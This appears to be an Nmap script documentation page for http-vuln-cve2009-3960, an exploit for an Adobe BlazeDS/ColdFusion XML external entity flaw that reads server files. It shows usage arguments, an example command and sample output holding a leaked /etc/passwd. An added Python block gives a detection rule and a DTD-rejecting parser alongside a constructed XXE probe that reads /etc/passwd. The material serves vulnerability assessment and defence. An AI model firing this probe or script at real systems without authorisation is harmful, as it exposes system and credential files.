Script http-vuln-cve2009-3960
Script types:
portrule
Categories:
exploit, intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2009-3960.nse
Script Summary
Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.
This vulnerability allows local files to be read remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.
For more information see:
- http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
- https://www.securityfocus.com/bid/38197
- Metasploit module: auxiliary/scanner/http/adobe_xml_inject
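Added here as an example (Python, not part of the NSE script or of Nmap): a request-side detection for the kind of probe this script sends, and the parser-side mitigation of refusing any DTD in an AMFX message. The endpoint paths are assumed from the sample output on this page, and the request bodies are constructed.

```python
import re
import xml.parsers.expat

# Paths the AMFX channel is served on. Assumption: the sample path seen in the
# script output plus the usual production path; adjust to the deployment.
AMFX_ENDPOINTS = ("/messagebroker/http", "/samples/messagebroker/http")

# An entity backed by a SYSTEM or PUBLIC identifier (general or parameter
# entity) is what turns a DTD into a file read; normal AMFX clients send no DTD.
SYSTEM_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def is_cve2009_3960_probe(path: str, body: bytes) -> bool:
    """Detection: True when a POST to an AMFX endpoint declares an external
    entity. Drop the path test to turn this into a generic XXE rule."""
    on_endpoint = any(path.startswith(p) for p in AMFX_ENDPOINTS)
    return on_endpoint and SYSTEM_ENTITY_RE.search(body) is not None


def parse_amfx_strict(body: bytes) -> bool:
    """Mitigation: parse with expat but abort on any DOCTYPE, so no entity can
    be declared, let alone resolved. Returns True only for a DTD-free,
    well-formed document."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised in a handler propagate out of Parse().
        raise ValueError("DTD not allowed in AMFX message")

    parser.StartDoctypeDeclHandler = reject_doctype
    try:
        parser.Parse(body, True)
    except (ValueError, xml.parsers.expat.ExpatError):
        return False
    return True


# Constructed sample bodies: a benign AMFX command and a file-read probe.
BENIGN = (b'<?xml version="1.0" encoding="utf-8"?>'
          b'<amfx ver="3"><body><object type="flex.messaging.messages.CommandMessage">'
          b'<traits/></object></body></amfx>')
PROBE = (b'<?xml version="1.0" encoding="utf-8"?>'
         b'<!DOCTYPE x [<!ENTITY f SYSTEM "file:///etc/passwd">]>'
         b'<amfx ver="3"><body><object><string>&f;</string></object></body></amfx>')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("probe", PROBE)):
        print(name, is_cve2009_3960_probe("/messagebroker/http", body),
              parse_amfx_strict(body))
```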
Script Arguments
- http-vuln-cve2009-3960.root
Root path of the web application. Defaults to "/".
- http-vuln-cve2009-3960.readfile
Target file to be read. Defaults to "/etc/passwd".
- slaxml.debug
See the documentation for the slaxml library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
- vulns.short, vulns.showall
See the documentation for the vulns library.
Example Usage
nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>
Script Output
PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|   samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_
License: Same as Nmap--See https://nmap.org/book/man-legal.html